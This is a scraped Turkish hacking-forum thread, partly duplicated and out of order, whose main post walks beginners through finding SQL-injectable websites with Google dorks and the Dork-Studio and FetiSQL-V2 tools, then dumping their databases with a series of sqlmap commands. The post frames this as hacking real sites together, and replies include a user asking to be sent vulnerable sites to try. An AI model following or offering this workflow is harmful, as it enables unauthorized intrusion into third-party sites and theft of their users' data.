Root olarak dene veya terminal yerine toolun dosyasını bul ordan değiştir
Birlikte Web Site Hackleyelim!!!
- Konbuyu başlatan .net :)
- Başlangıç tarihi
- 22 Mar 2018
- 245
- 16
knk sürekli onaylama çıkıyor googel taramada her tarmasında ?
Tarama yapmadan doğrulama veriyorsa lütfen modeminizi yeniden başlatın ip adresinizle ilgili sorun oluyordur bendede olmuştu ama modemi kapatıp açtıktan sonra düzeldi
- 22 Mar 2018
- 245
- 16
Hayır sadece tek seferliğe mahsus bir durum bu bende de öyle olmuştu aç kapa yaptım bir dahada hiçbir şekilde olmadı
Xss öğrendikten sonra neden olmasın
- 22 Mar 2018
- 245
- 16
knk aç kapa yaptım yine aynı şeye dönüyor taratıyor geçiyorum hop tekrar geliyor 3 defa modem resetledim
@Enistein hocanın konusunun altında yazım size cevap verecektir bende sadece bir kere oldu ve sağolsun yardımcı oldu kendisi bana.
- 22 Mar 2018
- 245
- 16
düzeltim knkim programda bi buglanma oldu onu düzeltim sorun yok şuan
linuxta nbaşladıysan knk temele gir direk
Bence bir programlama dili öğrenerek başla python olabilir mesela ordan kendine tool yazabilirsin veya bir kaç eğitim serisi bulup temel olarak geliştirebilirsin kendini hacking alanında
- 18 Mar 2023
- 37
- 7
dost ben fetisql ile 2 ye basıyorum bana web site yok diyor
dork tara diyorum firefox üstünden kendi kendine bir şeyler yapıyor.Öncellikle siz değerli forum üyemizi/yöneticimizi burda görmekten mutluluk duyuyorum
Bugünki konumda dork oluşturup oluşturduğumuz dorkları tarayıp sql açıklı siteler bulup o sitelerden bir tanesini birlikte hackliyelim ne dersiniz ?
Konunun Temel Amacı Ne ?
Bu konuyu açmamdaki temel amaç web hacking başlıyacak olan arkadaşlara bir nebze bile olsun yol göstermek kafalarında bir fikir oluşturmak
Konunun Sonunda Ne Elde Edeceksiniz ?
Bu konu sonunda temel olarak dork oluşturabilecek, dorkları taratıp sql açıklı site tespit edip bu zaafiyetli sitelerden gerekli verileri ele geçirebileceksiniz
Herhangi bir sorunuz olursa lütfen konu altında belirtiniz
Başlıyalım
1- Dork (Google Dorks) Oluşturma
Nedir Bu Google Dork ?
Google dork, özel anahtar kelimeler veya operatörler kullanarak Google'da arama yapmak için kullanılan bir terimdir. Google dorkları, arama sonuçlarında belirli türdeki bilgileri, hassas bilgileri veya güvenlik açıklarını ortaya çıkarmak için kullanılabilir. Bazı yaygın kullanılan Google dorkları şunlardır:
Otomatik Olarak Zaafiyetli Google Dork Oluşturma
Ben şahsım adına dork oluşturmak için bizzat emek vererek @Mentalistler hocanın biz forum üyeleri için oluşturmuş olduğu Dork Studio toolunu kullanacağım siz başka toolarda kullanabilirsiniz
İlk olarak toolumuzu Githubtan git clone yaparak indirmemiz gerekir bunun için terminalimize
Kod:git clone https://github.com/mentalistler/Dork-Studio.git
yazıyoruz sonrasında ise sırasıyla
Kod:cd Dork-Studio/
Kod:python -m pip install -r requirements.txt
yaptıktan sonra toolu çalıştırmak için
Kod:python manage.py runserver
ve tarafımıza böyle bir çıktı verecektir
şimdi ise tarayıcımızın url kısmına http://localhost:8000 yazıyoruz Karşımıza böyle bir arayüz gelecek
burda ilk olarak oluşturmak istediğimiz dork türünü seçiyoruz daha sonra ise wordlist seçelim ve istediğimiz herhangi bir ülke varsa onuda seçip devam et (Next) diyoruz daha sonraki ekranımız bu şekilde olacaktır
Burda üretmek istediğiniz dork sayısını giriniz daha sonrasında eğerki wordlist seçtiyseniz herhangi bir karakter sayısı girmenize gerek yok karşımıza vereceği çıktı bu şekilde olacaktır
Burdan txt görünümünü seçip kopyalıyoruz şimdi ise 2.toolumuz olan dork tarama ve sql açıklı site bulmak için biz forum üyeleri için bizzat @Mentalistler
tarafından yapılmış bit tool olan fetisql v2 kullanacağız bunun için ilk olarak sırasıyla
Kod:git clone https://github.com/mentalistler/FetiSQL-V2.git cd FetiSQL-V2 pip install -r requirements.txt python main.py
Açılan menüde ilk olarak dork taratacağımız için ilk önce FetiSQL-V2 klasorüne gelip files/dorks.txt içine kopyaladığımız (oluşturduğumuz) dorkları yapıştırıyoruz kaydedip çıktıktan sonra terminalden FetiSQL-V2 çalıştırıyoruz
SQL açık kontrolü
Bunun için ekstra bir tool kurmamıza gerek yok zaten bu FetiSQL-V2 de mevcut bunun için menüden 2 diyip devam ediyoruz. Eğerki siz başka bir tooldan tarattıysanız dorklarınızı bulunan result dosyasını result/result.txt içine kaydediniz.işlem sonucunda açık olan siteleri bizler için böyle tek tek kaydedecektir.
Veri Çekme Nasıl Yapılır ?
Öncellikle FetiSQL-V2 toolumuzun bize verdiği açıklı siteler result/sql.txt içine kaydediliyor ordaki açıklı site linkini kopyalayıp yeni bir terminalde
Kod:sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --dbs
(çıktımız buna benzer olacaktır)
yapıp sitenin içinde barındırdığı database isimlerinini buluyoruz. (unutmadan eklemek istiyorum bu adımlarda y/n gibi sorular soruyor bazen bunlar c/s/q olabiliyor bu durumda sqlmap size önerdiğini büyük harfle gösterecektir Y/n gibi) Sonra ise
Kod:sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --current-db
yazıp hedef açıklı sitede aktif olarak kullanılan database ismini alıyoruz çıktımız bu sekilde olacaktır.
şimdi ise database içinde bulunan tabloları görüntüliyelim bunun için
Kod:sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --tables -D current db sonucumuzu yazıyoruz
çıktımız bu şekilde olacaktır burda tablo isimlerimizden az çok içinde hangi tür veriler bulunduğunu tahmin edebiliyoruz mesela benim örnekte önemli veriler kubrc_users ta olduğunu düşünüyorum şimdi ise bakalım seçtiğimiz tablonun içinde neler mevcutmuş bunun için
Kod:sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --columns -T seçtiğimiz tablo ismi -D current db ismi
çıktımız buna benziyecek peki burda neler olduğunu gördük ve önemli bilgiler mevcut nasıl içeriğine bakacaz derseniz bunun için
Kod:sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --columns -T seçtiğimiz tablo ismi -D current db ismi --dump
ve en son olarak bize verilerin nereye kaydedildiğini gösterir dosya yolunu kopyalayıp erişebilirsiniz
Önemli Bilgilendirmeler
1- Bazen veriler şifrelenmiş olarak gelebilir bunların terimsel isimlerine hash diyoruz bunları kırmak bazen zahmetli olabiliyor ancak kırılmayacak herhangi bir şifre yoktur.
2- @Mentalistler hoccanın tooları oldukça iyi daha detaylı bilgi için
3- FetiSQL-V2 konu linki FetiSQL-V2
4- Dork-Studio konu linki Dork-Studio
5- SQL ile herhangi bir bilginiz yok ise Web Hacking Giriş
6- hashları kırmak için Pass The Hash Saldırısı
Umarım Faydalı Olabilmişimdir
Evet dorks.txt içi deki dorkları kendisi tarayıp bulduğu siteleri results.txt ye kaydediyor bu normal
Önce dork ları taratman gerek dorkları tarattıktan sonra daha yeni 2. Seçeneği seçip results.txt içindeki siteleri tek tek kontrol edip sql açığı olan siteleri gösterecek
- 18 Mar 2023
- 37
- 7
arattığımda sql açıklı site bulamıyor ama. results 0
Yeni dorklar oluşturun ve sayıyı biraz fazla tutun dorklarıda konuda bahsettiğim tool ile dork oluşturun
Veya yeni bir wordlist ekleyip öyle taratın
- 18 Mar 2023
- 37
- 7
bana özelden açıklı bir kaç site atar mısın deneme yapacağım. sabırsızlanıyorum
Malesef şu anda teknik aksaklıklar yüzünden internet bağlantım bulunmamakta
hocam çok sağolun fakat results/sql.txt kaydedildi! dedikten sonra txt dosyasının içine girdiğimde bomboş gözüküyor ne yapmam gerek bunun içinÖncellikle siz değerli forum üyemizi/yöneticimizi burda görmekten mutluluk duyuyorum
Bugünki konumda dork oluşturup oluşturduğumuz dorkları tarayıp sql açıklı siteler bulup o sitelerden bir tanesini birlikte hackliyelim ne dersiniz ?
Konunun Temel Amacı Ne ?
Bu konuyu açmamdaki temel amaç web hacking başlıyacak olan arkadaşlara bir nebze bile olsun yol göstermek kafalarında bir fikir oluşturmak
Konunun Sonunda Ne Elde Edeceksiniz ?
Bu konu sonunda temel olarak dork oluşturabilecek, dorkları taratıp sql açıklı site tespit edip bu zaafiyetli sitelerden gerekli verileri ele geçirebileceksiniz
Herhangi bir sorunuz olursa lütfen konu altında belirtiniz
Başlıyalım
1- Dork (Google Dorks) Oluşturma
Nedir Bu Google Dork ?
Google dork, özel anahtar kelimeler veya operatörler kullanarak Google'da arama yapmak için kullanılan bir terimdir. Google dorkları, arama sonuçlarında belirli türdeki bilgileri, hassas bilgileri veya güvenlik açıklarını ortaya çıkarmak için kullanılabilir. Bazı yaygın kullanılan Google dorkları şunlardır:
Otomatik Olarak Zaafiyetli Google Dork Oluşturma
Ben şahsım adına dork oluşturmak için bizzat emek vererek @Mentalistler hocanın biz forum üyeleri için oluşturmuş olduğu Dork Studio toolunu kullanacağım siz başka toolarda kullanabilirsiniz
İlk olarak toolumuzu Githubtan git clone yaparak indirmemiz gerekir bunun için terminalimize
Kod:git clone https://github.com/mentalistler/Dork-Studio.git
yazıyoruz sonrasında ise sırasıyla
Kod:cd Dork-Studio/
Kod:python -m pip install -r requirements.txt
yaptıktan sonra toolu çalıştırmak için
Kod:python manage.py runserver
ve tarafımıza böyle bir çıktı verecektir
şimdi ise tarayıcımızın url kısmına http://localhost:8000 yazıyoruz Karşımıza böyle bir arayüz gelecek
burda ilk olarak oluşturmak istediğimiz dork türünü seçiyoruz daha sonra ise wordlist seçelim ve istediğimiz herhangi bir ülke varsa onuda seçip devam et (Next) diyoruz daha sonraki ekranımız bu şekilde olacaktır
Burda üretmek istediğiniz dork sayısını giriniz daha sonrasında eğerki wordlist seçtiyseniz herhangi bir karakter sayısı girmenize gerek yok karşımıza vereceği çıktı bu şekilde olacaktır
Burdan txt görünümünü seçip kopyalıyoruz şimdi ise 2.toolumuz olan dork tarama ve sql açıklı site bulmak için biz forum üyeleri için bizzat @Mentalistler
tarafından yapılmış bit tool olan fetisql v2 kullanacağız bunun için ilk olarak sırasıyla
Kod:git clone https://github.com/mentalistler/FetiSQL-V2.git cd FetiSQL-V2 pip install -r requirements.txt python main.py
Açılan menüde ilk olarak dork taratacağımız için ilk önce FetiSQL-V2 klasorüne gelip files/dorks.txt içine kopyaladığımız (oluşturduğumuz) dorkları yapıştırıyoruz kaydedip çıktıktan sonra terminalden FetiSQL-V2 çalıştırıyoruz
SQL açık kontrolü
Bunun için ekstra bir tool kurmamıza gerek yok zaten bu FetiSQL-V2 de mevcut bunun için menüden 2 diyip devam ediyoruz. Eğerki siz başka bir tooldan tarattıysanız dorklarınızı bulunan result dosyasını result/result.txt içine kaydediniz.işlem sonucunda açık olan siteleri bizler için böyle tek tek kaydedecektir.
Veri Çekme Nasıl Yapılır ?
Öncellikle FetiSQL-V2 toolumuzun bize verdiği açıklı siteler result/sql.txt içine kaydediliyor ordaki açıklı site linkini kopyalayıp yeni bir terminalde
Kod:sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --dbs
(çıktımız buna benzer olacaktır)
yapıp sitenin içinde barındırdığı database isimlerinini buluyoruz. (unutmadan eklemek istiyorum bu adımlarda y/n gibi sorular soruyor bazen bunlar c/s/q olabiliyor bu durumda sqlmap size önerdiğini büyük harfle gösterecektir Y/n gibi) Sonra ise
Kod:sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --current-db
yazıp hedef açıklı sitede aktif olarak kullanılan database ismini alıyoruz çıktımız bu sekilde olacaktır.
şimdi ise database içinde bulunan tabloları görüntüliyelim bunun için
Kod:sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --tables -D current db sonucumuzu yazıyoruz
çıktımız bu şekilde olacaktır burda tablo isimlerimizden az çok içinde hangi tür veriler bulunduğunu tahmin edebiliyoruz mesela benim örnekte önemli veriler kubrc_users ta olduğunu düşünüyorum şimdi ise bakalım seçtiğimiz tablonun içinde neler mevcutmuş bunun için
Kod:sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --columns -T seçtiğimiz tablo ismi -D current db ismi
çıktımız buna benziyecek peki burda neler olduğunu gördük ve önemli bilgiler mevcut nasıl içeriğine bakacaz derseniz bunun için
Kod:sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --columns -T seçtiğimiz tablo ismi -D current db ismi --dump
ve en son olarak bize verilerin nereye kaydedildiğini gösterir dosya yolunu kopyalayıp erişebilirsiniz
Önemli Bilgilendirmeler
1- Bazen veriler şifrelenmiş olarak gelebilir bunların terimsel isimlerine hash diyoruz bunları kırmak bazen zahmetli olabiliyor ancak kırılmayacak herhangi bir şifre yoktur.
2- @Mentalistler hoccanın tooları oldukça iyi daha detaylı bilgi için
3- FetiSQL-V2 konu linki FetiSQL-V2
4- Dork-Studio konu linki Dork-Studio
5- SQL ile herhangi bir bilginiz yok ise Web Hacking Giriş
6- hashları kırmak için Pass The Hash Saldırısı
Umarım Faydalı Olabilmişimdir
Son düzenleme:
Sql açıklı site bulamamış olabilir
